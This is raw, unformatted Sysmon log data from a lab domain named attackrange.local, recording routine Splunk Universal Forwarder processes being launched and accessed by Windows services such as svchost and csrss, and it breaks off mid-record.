22:15:30.005{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033148Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:30.005{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033147Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:30.005{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033146Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:30.005{FF16AF91-26B4-6013-0500-00000000A401}6442212C:\Windows\system32\csrss.exe{FF16AF91-3782-6013-9003-00000000A401}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033145Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:30.005{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3782-6013-9003-00000000A401}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033144Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:30.006{FF16AF91-3782-6013-9003-00000000A401}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362681Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:31.662{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-3783-6013-cc03-000000001100}8928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362680Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:31.662{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362679Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:31.662{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362678Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:31.662{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362677Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:31.662{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362676Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:31.662{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-3783-6013-cc03-000000001100}8928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362675Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:31.662{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-3783-6013-cc03-000000001100}8928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362674Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:31.663{8e433fbf-3783-6013-cc03-000000001100}8928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033168Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.927{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3783-6013-9203-00000000A401}2856C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033167Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.927{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033166Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.927{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033165Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.927{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033164Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.927{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033163Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.927{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-3783-6013-9203-00000000A401}2856C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033162Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.927{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3783-6013-9203-00000000A401}2856C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033161Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.928{FF16AF91-3783-6013-9203-00000000A401}2856C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033160Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.255{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3783-6013-9103-00000000A401}5876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033159Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.255{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033158Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.255{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033157Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.255{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033156Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.255{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033155Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.255{FF16AF91-26B4-6013-0500-00000000A401}6441200C:\Windows\system32\csrss.exe{FF16AF91-3783-6013-9103-00000000A401}5876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033154Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:31.255{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3783-6013-9103-00000000A401}5876C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program 